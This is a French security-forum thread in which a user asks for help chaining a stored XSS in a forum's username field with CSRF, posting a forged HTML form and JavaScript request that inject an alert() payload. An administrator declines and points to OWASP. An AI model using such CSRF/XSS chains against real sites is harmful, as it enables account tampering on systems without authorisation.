Auteur Sujet: XSS via CRSF en javascript  (Lu 2354 fois)

0 Membres et 1 Invité sur ce sujet

Hors ligne Frenchcore44

  • Membre régulier
  • **
  • Messages: 97
  • +2/-0
XSS via CRSF en javascript
« le: 17 juin 2019 à 20:59:14 »
Salut,
J'aurais besoin d'aide pour exploiter une faille XSS via une crsf,
Je m'explique enfaîte sur un forum il y a un champs ou on peut changer sont pseudo,
Avec se champ quand on change sont pseudo après le pseudo est refléter
Du coup j'ai essayer avec des filtres XSS est bingo j'ai eu le message d'alert XSS

Après avoir changer ùon pseudo en "><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT>

J'ai regarder si les gens qui visitez mon profil avais la message d'alert XSS
J'ai essayer et ça ne marcher pas.

Finalement j'en n'est déduis la seul façon de exploiter cette faille XSS était de faire changer le pseudo de la victime
C'est la ou la CRSF intervient et j'ai regarder le champ pour changer le pseudo est il y avait aucun token de session ni de http referer dans le http header.

Mais sauf le problèmes si je veut recopier le formulaire html du champ vulnérable la XSS s’exécutera automatiquement sur la page piègé CRSF  du coup la requette ne pourras pas se faire pour changer le pseudo

Voici le formulaire HTML piégé


<form method="post" action="www.xxxx.index.php">
            <div class="form-line">
                <label for="pseudo">You can only change your username once a month.</label>
                <input type="text" name="pseudo" id="pseudo" value=""><SCRIPT>alert(String.fromCharCode(88,83,83))" </SCRIPT> class="input-text" />
            </div>
            <div class="form-line">
                <input type="hidden" name="action" value="pseudo" />
                <input type="submit" class="input-submit" value="Use this username" />
            </div>
        </form>
<script language="javascript">document.pls.submit();</script>

 

Du coup pour pouvoir exécuter du code j'ai pensez de faire en javascript comme le script XSS rendre en confusion avec la page piégé CRSF

Voici le code Javascript


<script>
 var formData = new FormData();
     
    formData.append('pseudo', '"><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT>');
     formData.append('action', 'pseudo');
    var request = new XMLHttpRequest();
    request.open("POST", "www.xxxx.index.php");
    request.send(formData);
</script>

Du coup j'ai regarder sur internet comment je pourrais faire cela, sauf je ne connais pas le javascript, ducoup je vous demande si quelqu’un peut me dire pourquoi cela marche pas en javascript
et je tient à précisez se que je tente de faire c'est a but éducatif

merci d’avance au revoir
« Modifié: 17 juin 2019 à 21:01:08 par Frenchcore44 »
>l3$ 3l1t3$ 0l1garc1qu3$ m0nd1al1st3 et l3ur$ ma1tr3s 0ccult3s v0us r3m3rc13nts d3 v0tr3 part1c1pat10ns à l'av3nc33 d3 la m1s3 3n plac3 du n0uv3l 0rdr3 m0ndial
 
0rd0 Ab Cha0 / P0ur V0tr3 S3cur1t3 V0u$ N' @ur3z P1u$ D3 L1b1t33 / Qu1 @pp@rti3nt L3 p@ss3 @pp@rti3nt L3 Pr3s3nt / % P0ur M13uX R3gn3r

Hors ligne ZeR0-@bSoLu

  • Administrateur
  • Membre Elite
  • *****
  • Messages: 2510
  • +138/-4
  • Pentest - Arch - Python - Kali
    • Kali-fr
Re : XSS via CRSF en javascript
« Réponse #1 le: 17 juin 2019 à 21:04:31 »
Pour ne pas répondre directement à ta question car je pense que d'utiliser ça sur un forum c'est malsaint , voici un truc que tu peux lire à ce sujet.

https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)
Mess  with the bests.
Die like the rest.

Hors ligne Frenchcore44

  • Membre régulier
  • **
  • Messages: 97
  • +2/-0
Re : XSS via CRSF en javascript
« Réponse #2 le: 17 juin 2019 à 21:10:08 »
Re, salut, merci de ta réponses, c'est pour démontrez a l'admin que l'input pour le pseudo est vulnérable a la crsf, et quand je lui dit ça il dit que normalement on devais pas cliquez sur les liens, ducoup j'essaye de lui montrez que se n'est pas à prendre à la légère , mais sinon merci je vais checker l’article
>l3$ 3l1t3$ 0l1garc1qu3$ m0nd1al1st3 et l3ur$ ma1tr3s 0ccult3s v0us r3m3rc13nts d3 v0tr3 part1c1pat10ns à l'av3nc33 d3 la m1s3 3n plac3 du n0uv3l 0rdr3 m0ndial
 
0rd0 Ab Cha0 / P0ur V0tr3 S3cur1t3 V0u$ N' @ur3z P1u$ D3 L1b1t33 / Qu1 @pp@rti3nt L3 p@ss3 @pp@rti3nt L3 Pr3s3nt / % P0ur M13uX R3gn3r

Hors ligne ZeR0-@bSoLu

  • Administrateur
  • Membre Elite
  • *****
  • Messages: 2510
  • +138/-4
  • Pentest - Arch - Python - Kali
    • Kali-fr
Re : XSS via CRSF en javascript
« Réponse #3 le: 18 juin 2019 à 09:33:21 »
Je comprends bien tes intentions et j'aurai certainement fais la même chose mais par principe je ne peux pas m'impliquer personnellement dans ça :)

Néanmoins si tu as des questions sur le liens que je t'ai filé ou sur les CRSF de manière générale aucun problème :)
Mess  with the bests.
Die like the rest.